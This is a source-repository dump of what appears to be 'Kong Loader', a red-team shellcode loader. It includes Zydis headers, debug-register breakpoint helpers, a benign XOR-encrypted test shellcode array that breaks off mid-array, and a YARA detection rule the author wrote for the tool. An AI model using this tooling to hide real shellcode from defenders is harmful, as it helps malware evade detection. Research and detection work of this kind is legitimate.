77 | * The instruction exceeded the maximum length of 15 bytes.
78 | */
79 | #define ZYDIS_STATUS_INSTRUCTION_TOO_LONG \
80 | ZYAN_MAKE_STATUS(1u, ZYAN_MODULE_ZYDIS, 0x02u)
81 |
82 | /**
83 | * The instruction encoded an invalid register.
84 | */
85 | #define ZYDIS_STATUS_BAD_REGISTER \
86 | ZYAN_MAKE_STATUS(1u, ZYAN_MODULE_ZYDIS, 0x03u)
87 |
88 | /**
89 | * A lock-prefix (F0) was found while decoding an instruction that does not
90 | * support locking.
91 | */
92 | #define ZYDIS_STATUS_ILLEGAL_LOCK \
93 | ZYAN_MAKE_STATUS(1u, ZYAN_MODULE_ZYDIS, 0x04u)
94 |
95 | /**
96 | * A legacy-prefix (F2, F3, 66) was found while decoding a XOP/VEX/EVEX/MVEX
97 | * instruction.
98 | */
99 | #define ZYDIS_STATUS_ILLEGAL_LEGACY_PFX \
100 | ZYAN_MAKE_STATUS(1u, ZYAN_MODULE_ZYDIS, 0x05u)
101 |
102 | /**
103 | * A rex-prefix was found while decoding a XOP/VEX/EVEX/MVEX instruction.
104 | */
105 | #define ZYDIS_STATUS_ILLEGAL_REX \
106 | ZYAN_MAKE_STATUS(1u, ZYAN_MODULE_ZYDIS, 0x06u)
107 |
108 | /**
109 | * An invalid opcode-map value was found while decoding a XOP/VEX/EVEX/MVEX-prefix.
110 | */
111 | #define ZYDIS_STATUS_INVALID_MAP \
112 | ZYAN_MAKE_STATUS(1u, ZYAN_MODULE_ZYDIS, 0x07u)
113 |
114 | /**
115 | * An error occured while decoding the EVEX-prefix.
116 | */
117 | #define ZYDIS_STATUS_MALFORMED_EVEX \
118 | ZYAN_MAKE_STATUS(1u, ZYAN_MODULE_ZYDIS, 0x08u)
119 |
120 | /**
121 | * An error occured while decoding the MVEX-prefix.
122 | */
123 | #define ZYDIS_STATUS_MALFORMED_MVEX \
124 | ZYAN_MAKE_STATUS(1u, ZYAN_MODULE_ZYDIS, 0x09u)
125 |
126 | /**
127 | * An invalid write-mask was specified for an EVEX/MVEX instruction.
128 | */
129 | #define ZYDIS_STATUS_INVALID_MASK \
130 | ZYAN_MAKE_STATUS(1u, ZYAN_MODULE_ZYDIS, 0x0Au)
131 |
132 | /* ---------------------------------------------------------------------------------------------- */
133 | /* Formatter */
134 | /* ---------------------------------------------------------------------------------------------- */
135 |
136 | /**
137 | * Returning this status code in some specified formatter callbacks will cause
138 | * the formatter to omit the corresponding token.
139 | *
140 | * Valid callbacks:
141 | * - `ZYDIS_FORMATTER_FUNC_PRE_OPERAND`
142 | * - `ZYDIS_FORMATTER_FUNC_POST_OPERAND`
143 | * - `ZYDIS_FORMATTER_FUNC_FORMAT_OPERAND_REG`
144 | * - `ZYDIS_FORMATTER_FUNC_FORMAT_OPERAND_MEM`
145 | * - `ZYDIS_FORMATTER_FUNC_FORMAT_OPERAND_PTR`
146 | * - `ZYDIS_FORMATTER_FUNC_FORMAT_OPERAND_IMM`
147 | */
148 | #define ZYDIS_STATUS_SKIP_TOKEN \
149 | ZYAN_MAKE_STATUS(0u, ZYAN_MODULE_ZYDIS, 0x0Bu)
150 |
151 | /* ---------------------------------------------------------------------------------------------- */
152 | /* Encoder */
153 | /* ---------------------------------------------------------------------------------------------- */
154 |
155 | #define ZYDIS_STATUS_IMPOSSIBLE_INSTRUCTION \
156 | ZYAN_MAKE_STATUS(1u, ZYAN_MODULE_ZYDIS, 0x0Cu)
157 |
158 | /* ---------------------------------------------------------------------------------------------- */
159 |
160 | /* ============================================================================================== */
161 |
162 |
163 | #ifdef __cplusplus
164 | }
165 | #endif
166 |
167 | #endif /* ZYDIS_STATUS_H */
168 |
--------------------------------------------------------------------------------
/inc/Zydis/Utils.h:
--------------------------------------------------------------------------------
1 | /***************************************************************************************************
2 |
3 | Zyan Disassembler Library (Zydis)
4 |
5 | Original Author : Florian Bernd
6 |
7 | * Permission is hereby granted, free of charge, to any person obtaining a copy
8 | * of this software and associated documentation files (the "Software"), to deal
9 | * in the Software without restriction, including without limitation the rights
10 | * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | * copies of the Software, and to permit persons to whom the Software is
12 | * furnished to do so, subject to the following conditions:
13 | *
14 | * The above copyright notice and this permission notice shall be included in all
15 | * copies or substantial portions of the Software.
16 | *
17 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | * SOFTWARE.
24 |
25 | ***************************************************************************************************/
26 |
27 | /**
28 | * @file
29 | * Other utility functions.
30 | */
31 |
32 | #ifndef ZYDIS_UTILS_H
33 | #define ZYDIS_UTILS_H
34 |
35 | #include
36 | #include
37 | #include
38 |
39 | #ifdef __cplusplus
40 | extern "C" {
41 | #endif
42 |
43 | /* ============================================================================================== */
44 | /* Exported functions */
45 | /* ============================================================================================== */
46 |
47 | /**
48 | * @addtogroup utils Utils
49 | * Miscellaneous utility functions. Address translation and other helpers.
50 | * @{
51 | */
52 |
53 | /* ---------------------------------------------------------------------------------------------- */
54 | /* Address calculation */
55 | /* ---------------------------------------------------------------------------------------------- */
56 |
57 | // TODO: Provide a function that works in minimal-mode and does not require a operand parameter
58 |
59 | /**
60 | * Calculates the absolute address value for the given instruction operand.
61 | *
62 | * @param instruction A pointer to the `ZydisDecodedInstruction` struct.
63 | * @param operand A pointer to the `ZydisDecodedOperand` struct.
64 | * @param runtime_address The runtime address of the instruction.
65 | * @param result_address A pointer to the memory that receives the absolute address.
66 | *
67 | * @return A zyan status code.
68 | *
69 | * You should use this function in the following cases:
70 | * - `IMM` operands with relative address (e.g. `JMP`, `CALL`, ...)
71 | * - `MEM` operands with `RIP`/`EIP`-relative address (e.g. `MOV RAX, [RIP+0x12345678]`)
72 | * - `MEM` operands with absolute address (e.g. `MOV RAX, [0x12345678]`)
73 | * - The displacement needs to get truncated and zero extended
74 | */
75 | ZYDIS_EXPORT ZyanStatus ZydisCalcAbsoluteAddress(const ZydisDecodedInstruction* instruction,
76 | const ZydisDecodedOperand* operand, ZyanU64 runtime_address, ZyanU64* result_address);
77 |
78 | /**
79 | * Calculates the absolute address value for the given instruction operand.
80 | *
81 | * @param instruction A pointer to the `ZydisDecodedInstruction` struct.
82 | * @param operand A pointer to the `ZydisDecodedOperand` struct.
83 | * @param runtime_address The runtime address of the instruction.
84 | * @param register_context A pointer to the `ZydisRegisterContext` struct.
85 | * @param result_address A pointer to the memory that receives the absolute target-address.
86 | *
87 | * @return A zyan status code.
88 | *
89 | * This function behaves like `ZydisCalcAbsoluteAddress` but takes an additional register-context
90 | * argument to allow calculation of addresses depending on runtime register values.
91 | *
92 | * Note that `IP/EIP/RIP` from the register-context will be ignored in favor of the passed
93 | * runtime-address.
94 | */
95 | ZYDIS_EXPORT ZyanStatus ZydisCalcAbsoluteAddressEx(const ZydisDecodedInstruction* instruction,
96 | const ZydisDecodedOperand* operand, ZyanU64 runtime_address,
97 | const ZydisRegisterContext* register_context, ZyanU64* result_address);
98 |
99 | /* ---------------------------------------------------------------------------------------------- */
100 |
101 | /**
102 | * @}
103 | */
104 |
105 | /* ============================================================================================== */
106 |
107 | #ifdef __cplusplus
108 | }
109 | #endif
110 |
111 | #endif /* ZYDIS_UTILS_H */
112 |
--------------------------------------------------------------------------------
/inc/Zydis/Zydis.h:
--------------------------------------------------------------------------------
1 | /***************************************************************************************************
2 |
3 | Zyan Disassembler Library (Zydis)
4 |
5 | Original Author : Florian Bernd
6 |
7 | * Permission is hereby granted, free of charge, to any person obtaining a copy
8 | * of this software and associated documentation files (the "Software"), to deal
9 | * in the Software without restriction, including without limitation the rights
10 | * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | * copies of the Software, and to permit persons to whom the Software is
12 | * furnished to do so, subject to the following conditions:
13 | *
14 | * The above copyright notice and this permission notice shall be included in all
15 | * copies or substantial portions of the Software.
16 | *
17 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | * SOFTWARE.
24 |
25 | ***************************************************************************************************/
26 |
27 | /**
28 | * @file
29 | * Master include file. Includes everything else.
30 | */
31 |
32 | #ifndef ZYDIS_H
33 | #define ZYDIS_H
34 |
35 | #include
36 | #include
37 |
38 | #if !defined(ZYDIS_DISABLE_DECODER)
39 | # include
40 | # include
41 | #endif
42 |
43 | #if !defined(ZYDIS_DISABLE_ENCODER)
44 | # include
45 | #endif
46 |
47 | #if !defined(ZYDIS_DISABLE_FORMATTER)
48 | # include
49 | #endif
50 |
51 | #if !defined(ZYDIS_DISABLE_SEGMENT)
52 | # include
53 | #endif
54 |
55 | #if !defined(ZYDIS_DISABLE_DECODER) && !defined(ZYDIS_DISABLE_FORMATTER)
56 | # include
57 | #endif
58 |
59 | #include
60 | #include
61 | #include
62 | #include
63 | #include
64 | #include
65 |
66 | #ifdef __cplusplus
67 | extern "C" {
68 | #endif
69 |
70 | /**
71 | * @addtogroup version Version
72 | *
73 | * Functions for checking the library version and build options.
74 | *
75 | * @{
76 | */
77 |
78 | /* ============================================================================================== */
79 | /* Macros */
80 | /* ============================================================================================== */
81 |
82 | /* ---------------------------------------------------------------------------------------------- */
83 | /* Constants */
84 | /* ---------------------------------------------------------------------------------------------- */
85 |
86 | /**
87 | * A macro that defines the zydis version.
88 | */
89 | #define ZYDIS_VERSION (ZyanU64)0x0004000100000000
90 |
91 | /* ---------------------------------------------------------------------------------------------- */
92 | /* Helper macros */
93 | /* ---------------------------------------------------------------------------------------------- */
94 |
95 | /**
96 | * Extracts the major-part of the zydis version.
97 | *
98 | * @param version The zydis version value
99 | */
100 | #define ZYDIS_VERSION_MAJOR(version) (ZyanU16)(((version) & 0xFFFF000000000000) >> 48)
101 |
102 | /**
103 | * Extracts the minor-part of the zydis version.
104 | *
105 | * @param version The zydis version value
106 | */
107 | #define ZYDIS_VERSION_MINOR(version) (ZyanU16)(((version) & 0x0000FFFF00000000) >> 32)
108 |
109 | /**
110 | * Extracts the patch-part of the zydis version.
111 | *
112 | * @param version The zydis version value
113 | */
114 | #define ZYDIS_VERSION_PATCH(version) (ZyanU16)(((version) & 0x00000000FFFF0000) >> 16)
115 |
116 | /**
117 | * Extracts the build-part of the zydis version.
118 | *
119 | * @param version The zydis version value
120 | */
121 | #define ZYDIS_VERSION_BUILD(version) (ZyanU16)((version) & 0x000000000000FFFF)
122 |
123 | /* ---------------------------------------------------------------------------------------------- */
124 |
125 | /* ============================================================================================== */
126 | /* Enums and types */
127 | /* ============================================================================================== */
128 |
129 | /**
130 | * Defines the `ZydisFeature` enum.
131 | */
132 | typedef enum ZydisFeature_
133 | {
134 | ZYDIS_FEATURE_DECODER,
135 | ZYDIS_FEATURE_ENCODER,
136 | ZYDIS_FEATURE_FORMATTER,
137 | ZYDIS_FEATURE_AVX512,
138 | ZYDIS_FEATURE_KNC,
139 | ZYDIS_FEATURE_SEGMENT,
140 |
141 | /**
142 | * Maximum value of this enum.
143 | */
144 | ZYDIS_FEATURE_MAX_VALUE = ZYDIS_FEATURE_SEGMENT,
145 | /**
146 | * The minimum number of bits required to represent all values of this enum.
147 | */
148 | ZYDIS_FEATURE_REQUIRED_BITS = ZYAN_BITS_TO_REPRESENT(ZYDIS_FEATURE_MAX_VALUE)
149 | } ZydisFeature;
150 |
151 | /* ============================================================================================== */
152 | /* Exported functions */
153 | /* ============================================================================================== */
154 |
155 | /**
156 | * Returns the zydis version.
157 | *
158 | * @return The zydis version.
159 | *
160 | * Use the macros provided in this file to extract the major, minor, patch and build part from the
161 | * returned version value.
162 | */
163 | ZYDIS_EXPORT ZyanU64 ZydisGetVersion(void);
164 |
165 | /**
166 | * Checks, if the specified feature is enabled in the current zydis library instance.
167 | *
168 | * @param feature The feature.
169 | *
170 | * @return `ZYAN_STATUS_TRUE` if the feature is enabled, `ZYAN_STATUS_FALSE` if not. Another
171 | * zyan status code, if an error occured.
172 | */
173 | ZYDIS_EXPORT ZyanStatus ZydisIsFeatureEnabled(ZydisFeature feature);
174 |
175 | /* ============================================================================================== */
176 |
177 | /**
178 | * @}
179 | */
180 |
181 | #ifdef __cplusplus
182 | }
183 | #endif
184 |
185 | #endif /* ZYDIS_H */
186 |
--------------------------------------------------------------------------------
/makefile:
--------------------------------------------------------------------------------
1 | # Mozilla Public License (MPL) Version 2.0.
2 | #
3 | # Copyright (c) 2024 Tijme Gommers (@tijme).
4 | #
5 | # This source code file is part of Kong Loader. Kong Loader is
6 | # licensed under Mozilla Public License (MPL) Version 2.0, and
7 | # you are free to use, modify, and distribute this file under
8 | # its terms. However, any modified versions of this file must
9 | # include this same license and copyright notice.
10 |
11 | CC_X64 := x86_64-w64-mingw32-gcc
12 | TARGET := KongLoader
13 |
14 | .PHONY: all clean ./dst/$(TARGET).x64.exe
15 |
16 | all: ./dst/$(TARGET).x64.exe
17 |
18 | clean:
19 | rm -f ./dst/$(TARGET).*
20 |
21 | ./dst/$(TARGET).x64.exe:
22 | $(CC_X64) ./src/$(TARGET).c -o ./dst/$(TARGET).x64.exe -masm=intel -I inc -ldbghelp -lkernel32 -luser32 -lntdll -lole32 -loleaut32
23 |
--------------------------------------------------------------------------------
/sig/kong_loader_native_code.yara:
--------------------------------------------------------------------------------
1 | rule KongLoader
2 | {
3 | meta:
4 | description = "Detects binaries that import AddVectoredExceptionHandler, ZydisDecoderDecodeFull and call VirtualAlloc with PAGE_EXECUTE_READWRITE"
5 | author = "Tijme Gommers"
6 | date = "2024-10-14"
7 | reference = "https://github.com/tijme/kong-loader"
8 |
9 | strings:
10 | // Look for import of AddVectoredExceptionHandler
11 | $import_AddVectoredExceptionHandler = { 41 64 64 56 65 63 74 6F 72 65 64 45 78 63 65 70 74 69 6F 6E 48 61 6E 64 6C 65 72 }
12 |
13 | // Look for import of ZydisDecoderDecodeFull
14 | $import_ZydisDecoderDecodeFull = { 5A 79 64 69 73 44 65 63 6F 64 65 72 44 65 63 6F 64 65 46 75 6C 6C }
15 |
16 | // Look for call to VirtualAlloc with PAGE_EXECUTE_READWRITE (0x40)
17 | $call_VirtualAlloc_PAGE_EXECUTE_READWRITE = {
18 | 41 B9 40 00 00 00 // push 0x40 (PAGE_EXECUTE_READWRITE)
19 | 41 B8 00 30 00 00 // push 0x3000 (MEM_COMMIT | MEM_RESERVE)
20 | ?? ?? ?? // push (dwShellcodeSize)
21 | B9 00 00 00 00 // push 0x0 (NULL)
22 | 48 8B 05 ?? ?? ?? ?? // mov rax, VirtualAlloc
23 | FF D0 // call rax
24 | }
25 |
26 | condition:
27 | all of ($import_*) and $call_VirtualAlloc_PAGE_EXECUTE_READWRITE
28 | }
--------------------------------------------------------------------------------
/src/helpers/CentralProcessingUnitHelper.c:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | /**
4 | * Mozilla Public License (MPL) Version 2.0.
5 | *
6 | * Copyright (c) 2024 Tijme Gommers (@tijme).
7 | *
8 | * This source code file is part of Kong Loader. Kong Loader is
9 | * licensed under Mozilla Public License (MPL) Version 2.0, and
10 | * you are free to use, modify, and distribute this file under
11 | * its terms. However, any modified versions of this file must
12 | * include this same license and copyright notice.
13 | */
14 |
15 | /**
16 | * Standard Input Output.
17 | *
18 | * Defines three variable types, several macros, and various functions for performing input and output.
19 | * https://www.tutorialspoint.com/c_standard_library/stdio_h.htm
20 | */
21 | #include
22 |
23 | /**
24 | * Standard Library.
25 | *
26 | * Defines four variable types, several macros, and various functions for performing general functions.
27 | * https://www.tutorialspoint.com/c_standard_library/stdlib_h.htm
28 | */
29 | #include
30 |
31 | /**
32 | * Integers.
33 | *
34 | * Defines macros that specify limits of integer types corresponding to types defined in other standard headers.
35 | * https://pubs.opengroup.org/onlinepubs/009696899/basedefs/stdint.h.html
36 | */
37 | #include
38 |
39 | /**
40 | * Booleans.
41 | *
42 | * Defines boolean types.
43 | * https://pubs.opengroup.org/onlinepubs/007904975/basedefs/stdbool.h.html
44 | */
45 | #include
46 |
47 | /**
48 | * Windows API.
49 | *
50 | * Contains declarations for all of the functions, macro's & data types in the Windows API.
51 | * https://docs.microsoft.com/en-us/previous-versions//aa383749(v=vs.85)?redirectedfrom=MSDN
52 | */
53 | #include
54 |
55 | /**
56 | * Include Zydis.
57 | *
58 | * Fast and lightweight x86/x86-64 disassembler and code generation library.
59 | * https://github.com/zyantific/zydis
60 | */
61 | #include
62 |
63 | /**
64 | * Obtain the given eflag from the given thread context.
65 | *
66 | * @param PCONTEXT lpContext The context of a specific thread.
67 | * @param uint32_t The eflag to obtain from the thread context.
68 | * @return bool Positive if the flag is set, negative otherwise.
69 | */
70 | bool getCpuFlagValue(PCONTEXT lpContext, uint32_t eflag) {
71 | switch (eflag) {
72 | case ZYDIS_CPUFLAG_OF: return (lpContext->EFlags & 0x00000400) != 0; break;
73 | case ZYDIS_CPUFLAG_IF: return (lpContext->EFlags & 0x00000200) != 0; break;
74 | case ZYDIS_CPUFLAG_SF: return (lpContext->EFlags & 0x00000080) != 0; break;
75 | case ZYDIS_CPUFLAG_ZF: return (lpContext->EFlags & 0x00000040) != 0; break;
76 | case ZYDIS_CPUFLAG_AF: return (lpContext->EFlags & 0x00000010) != 0; break;
77 | case ZYDIS_CPUFLAG_PF: return (lpContext->EFlags & 0x00000004) != 0; break;
78 | case ZYDIS_CPUFLAG_CF: return (lpContext->EFlags & 0x00000001) != 0; break;
79 | default:
80 | PRINT_FAILURE_AND_ABORT("Unknown eflag 0x%X in getCpuFlagValue().", eflag);
81 | }
82 | }
83 |
84 | /**
85 | * Obtain the value of the given register from the given thread context.
86 | *
87 | * @param PCONTEXT lpContext The context of a specific thread.
88 | * @param ZydisRegister zdKey The register to obtain the value from using the thread context.
89 | * @return uint64_t The actual value of the given register.
90 | */
91 | uint64_t getCpuRegisterValue(PCONTEXT lpContext, ZydisRegister zdKey) {
92 | switch (zdKey) {
93 | case ZYDIS_REGISTER_RAX: return lpContext->Rax; break;
94 | case ZYDIS_REGISTER_RCX: return lpContext->Rcx; break;
95 | case ZYDIS_REGISTER_RDX: return lpContext->Rdx; break;
96 | case ZYDIS_REGISTER_RBX: return lpContext->Rbx; break;
97 | case ZYDIS_REGISTER_RSP: return lpContext->Rsp; break;
98 | case ZYDIS_REGISTER_RBP: return lpContext->Rbp; break;
99 | case ZYDIS_REGISTER_RSI: return lpContext->Rsi; break;
100 | case ZYDIS_REGISTER_RDI: return lpContext->Rdi; break;
101 | case ZYDIS_REGISTER_RIP: return lpContext->Rip; break;
102 | case ZYDIS_REGISTER_R8: return lpContext->R8; break;
103 | case ZYDIS_REGISTER_R9: return lpContext->R9; break;
104 | case ZYDIS_REGISTER_R10: return lpContext->R10; break;
105 | case ZYDIS_REGISTER_R11: return lpContext->R11; break;
106 | case ZYDIS_REGISTER_R12: return lpContext->R12; break;
107 | case ZYDIS_REGISTER_R13: return lpContext->R13; break;
108 | case ZYDIS_REGISTER_R14: return lpContext->R14; break;
109 | case ZYDIS_REGISTER_R15: return lpContext->R15; break;
110 | default:
111 | PRINT_FAILURE_AND_ABORT("Registry key 0x%X not (yet) defined in getCpuRegisterValue() switch statement.", zdKey);
112 | }
113 | }
114 |
115 | /**
116 | * Obtain the argument index of a function based on Zydis register.
117 | *
118 | * @param ZydisRegister zdKey The register to obtain the argument index for.
119 | * @return uint32_t The argument index based on the x64 calling convention (CC).
120 | */
121 | uint32_t getCCArgumentIndexFromRegister(ZydisRegister zdKey) {
122 | switch (zdKey) {
123 | case ZYDIS_REGISTER_RCX: return 0; break;
124 | case ZYDIS_REGISTER_RDX: return 1; break;
125 | case ZYDIS_REGISTER_R8: return 2; break;
126 | case ZYDIS_REGISTER_R9: return 3; break;
127 | default:
128 | PRINT_FAILURE_AND_ABORT("Unknown argument index based on Zydis register 0x%X.", zdKey);
129 | }
130 | }
131 |
132 | /**
133 | * Obtain the register of a function based on an argument index.
134 | *
135 | * @param uint32_t dwArgumentIndex The argument index to obtain the register for.
136 | * @return ZydisRegister The register belonging to the argument index based on the x64 calling convention (CC).
137 | */
138 | ZydisRegister getCCRegisterFromArgumentIndex(uint32_t dwArgumentIndex) {
139 | switch (dwArgumentIndex) {
140 | case 0: return ZYDIS_REGISTER_RCX; break;
141 | case 1: return ZYDIS_REGISTER_RDX; break;
142 | case 2: return ZYDIS_REGISTER_R8; break;
143 | case 3: return ZYDIS_REGISTER_R9; break;
144 | default:
145 | PRINT_FAILURE_AND_ABORT("Unknown Zydis register based on argument index 0x%X.", dwArgumentIndex);
146 | }
147 | }
148 |
149 | /**
150 | * Configure a breakpoint in the debug registers.
151 | *
152 | * @param PCONTEXT lpContext A thread context during a vectored exception.
153 | * @param uint8_t* dwAddress The address to breakpoint on.
154 | */
155 | void SetBreakpoint(PCONTEXT lpContext, uint8_t* dwAddress) {
156 | if (dwAddress != NULL) {
157 | lpContext->Dr0 = (DWORD64) dwAddress;
158 | lpContext->Dr7 = 0x0000000000000001; // Enable breakpoint
159 | lpContext->Dr7 &= ~(1 << 16); // On execution only (not read/write)
160 | } else {
161 | lpContext->Dr0 = 0x0000000000000000;
162 | lpContext->Dr7 = 0x0000000000000000;
163 | }
164 | }
165 |
--------------------------------------------------------------------------------
/src/helpers/ConsoleHelper.c:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | /**
4 | * Mozilla Public License (MPL) Version 2.0.
5 | *
6 | * Copyright (c) 2024 Tijme Gommers (@tijme).
7 | *
8 | * This source code file is part of Kong Loader. Kong Loader is
9 | * licensed under Mozilla Public License (MPL) Version 2.0, and
10 | * you are free to use, modify, and distribute this file under
11 | * its terms. However, any modified versions of this file must
12 | * include this same license and copyright notice.
13 | */
14 |
15 | /**
16 | * Standard Input Output.
17 | *
18 | * Defines three variable types, several macros, and various functions for performing input and output.
19 | * https://www.tutorialspoint.com/c_standard_library/stdio_h.htm
20 | */
21 | #include
22 |
23 | /**
24 | * Standard Library.
25 | *
26 | * Defines four variable types, several macros, and various functions for performing general functions.
27 | * https://www.tutorialspoint.com/c_standard_library/stdlib_h.htm
28 | */
29 | #include
30 |
31 | /**
32 | * Integers.
33 | *
34 | * Defines macros that specify limits of integer types corresponding to types defined in other standard headers.
35 | * https://pubs.opengroup.org/onlinepubs/009696899/basedefs/stdint.h.html
36 | */
37 | #include
38 |
39 | /**
40 | * Time handling.
41 | *
42 | * Defines macros, types, and functions for manipulating date and time.
43 | * https://pubs.opengroup.org/onlinepubs/007908799/xsh/time.h.html
44 | */
45 | #include
46 |
47 | /**
48 | * Local definitions
49 | */
50 | #ifndef ENABLE_VERBOSE_PRINT_STATEMENTS
51 | #define ENABLE_VERBOSE_PRINT_STATEMENTS 0x0 // Verbose printing (if positive)
52 | #endif
53 |
54 | /**
55 | * Console color codes
56 | */
57 | #define COLOR_RESET "\x1b[0m"
58 | #define COLOR_GREEN "\x1b[32m"
59 | #define COLOR_YELLOW "\x1b[33m"
60 | #define COLOR_RED "\x1b[31m"
61 |
62 | /**
63 | * Define print methods
64 | */
65 | #define PRINT(...) { \
66 | time_t tNow; time(&tNow); struct tm* lpNow = localtime(&tNow); \
67 | fprintf(stdout, "[INSIGHT %02d:%02d:%02d] ", lpNow->tm_hour, lpNow->tm_min, lpNow->tm_sec); \
68 | fprintf(stdout, __VA_ARGS__); \
69 | fprintf(stdout, "\n"); \
70 | fflush(stdout); \
71 | }
72 |
73 | #define PRINT_SUCCESS(...) { \
74 | time_t tNow; time(&tNow); struct tm* lpNow = localtime(&tNow); \
75 | fprintf(stdout, COLOR_GREEN); \
76 | fprintf(stdout, "[SUCCESS %02d:%02d:%02d] ", lpNow->tm_hour, lpNow->tm_min, lpNow->tm_sec); \
77 | fprintf(stdout, __VA_ARGS__); \
78 | fprintf(stdout, "\n"); \
79 | fprintf(stdout, COLOR_RESET); \
80 | fflush(stdout); \
81 | }
82 |
83 | #define PRINT_WARNING(...) { \
84 | time_t tNow; time(&tNow); struct tm* lpNow = localtime(&tNow); \
85 | fprintf(stdout, COLOR_YELLOW); \
86 | fprintf(stdout, "[WARNING %02d:%02d:%02d] ", lpNow->tm_hour, lpNow->tm_min, lpNow->tm_sec); \
87 | fprintf(stdout, __VA_ARGS__); \
88 | fprintf(stdout, "\n"); \
89 | fprintf(stdout, COLOR_RESET); \
90 | fflush(stdout); \
91 | }
92 |
93 | #define PRINT_FAILURE_AND_ABORT(...) { \
94 | time_t tNow; time(&tNow); struct tm* lpNow = localtime(&tNow); \
95 | fprintf(stdout, COLOR_RED); \
96 | fprintf(stdout, "[FAILURE %02d:%02d:%02d] ", lpNow->tm_hour, lpNow->tm_min, lpNow->tm_sec); \
97 | fprintf(stdout, __VA_ARGS__); \
98 | fprintf(stdout, "\n"); \
99 | fprintf(stdout, COLOR_RESET); \
100 | fflush(stdout); \
101 | abort(); \
102 | }
103 |
104 | #define PRINT_VERBOSE(...) { \
105 | if (ENABLE_VERBOSE_PRINT_STATEMENTS) { \
106 | time_t tNow; time(&tNow); struct tm* lpNow = localtime(&tNow); \
107 | fprintf(stdout, "[VERBOSE %02d:%02d:%02d] ", lpNow->tm_hour, lpNow->tm_min, lpNow->tm_sec); \
108 | fprintf(stdout, __VA_ARGS__); \
109 | fprintf(stdout, "\n"); \
110 | fflush(stdout); \
111 | } \
112 | }
113 |
114 | /**
115 | * Print a banner showing `Kong Loader`.
116 | */
117 | void PrintBanner() {
118 | puts("");
119 | puts("888 d8P 888 888 ");
120 | puts("888 d8P 888 888 ");
121 | puts("888 d8P 888 888 ");
122 | puts("888d88K .d88b. 88888b. .d88b. 888 .d88b. 8888b. .d88888 .d88b. 888d888 ");
123 | puts("8888888b d88\"\"88b 888 \"88b d88P\"88b 888 d88\"\"88b \"88b d88\" 888 d8P Y8b 888P\" ");
124 | puts("888 Y88b 888 888 888 888 888 888 888 888 888 .d888888 888 888 88888888 888 ");
125 | puts("888 Y88b Y88..88P 888 888 Y88b 888 888 Y88..88P 888 888 Y88b 888 Y8b. 888 ");
126 | puts("888 Y88b \"Y88P\" 888 888 \"Y88888 88888888 \"Y88P\" \"Y888888 \"Y88888 \"Y8888 888 ");
127 | puts(" 888 ");
128 | puts(" The ART of rolling Y8b d88P Version 1.0 - Copyright 2024 Tijme Gommers ");
129 | puts(" shellcode decryption \"Y88P\" Mozilla Public License (MPL)-2.0 ");
130 | puts("");
131 | }
132 |
133 | /**
134 | * Print given value in HEX
135 | *
136 | * @param uint8_t* value An array of chars to print in HEX.
137 | * @param size_t length The amount of bytes/chars to print.
138 | * @param bool reverse Reverse the output (e.g. for a pointer).
139 | */
140 | void PrintInHex(uint8_t* lpBuffer, size_t lpNumberOfBytesRead, bool reverse) {
141 | for(size_t i = 0; i < lpNumberOfBytesRead; i ++) {
142 | size_t indexCorrected = reverse ? lpNumberOfBytesRead - i - 1 : i;
143 | printf("%02X ", lpBuffer[indexCorrected] & 0xff);
144 | }
145 |
146 | printf("\n");
147 | }
148 |
--------------------------------------------------------------------------------
/src/shellcode/Custom-AccessViolation-1.c:
--------------------------------------------------------------------------------
1 | /**
2 | * Mozilla Public License (MPL) Version 2.0.
3 | *
4 | * Copyright (c) 2024 Tijme Gommers (@tijme).
5 | *
6 | * This source code file is part of Kong Loader. Kong Loader is
7 | * licensed under Mozilla Public License (MPL) Version 2.0, and
8 | * you are free to use, modify, and distribute this file under
9 | * its terms. However, any modified versions of this file must
10 | * include this same license and copyright notice.
11 | */
12 |
13 | /**
14 | * Predefined definitions
15 | */
16 | #define STATIC_SHELLCODE_NAME "Custom-AccessViolation-1" // Name to be printed
17 | #define STATIC_SHELLCODE_IS_ALREADY_ENCRYPTED 0x0 // May only be negative for debugging purposes with plain static shellcode
18 | #define STATIC_SHELLCODE_HAS_RETURN_VALUE 0x1 // Print return value of the shellcode to the console
19 |
20 | /**
21 | * The XOR password to use.
22 | */
23 | static uint8_t StaticPassword[] = { 0xAA };
24 |
25 | /**
26 | * The shellcode to use.
27 | *
28 | * This is custom written shellcode. Yields an access denied (access violation).
29 | */
30 | static uint8_t StaticShellcode[] = {
31 | 0x48, 0x31, 0xC0, // xor rax, rax ; Clear RAX register
32 | 0x48, 0xC7, 0xC1, 0x01, 0x00, 0x00, 0x00, // mov rcx, 1 ; Move 1 into RCX (first argument)
33 | 0x48, 0xC7, 0xC2, 0x02, 0x00, 0x00, 0x00, // mov rdx, 2 ; Move 2 into RDX (second argument)
34 | 0x49, 0xC7, 0xC0, 0x03, 0x00, 0x00, 0x00, // mov r8, 3 ; Move 3 into R8 (third argument)
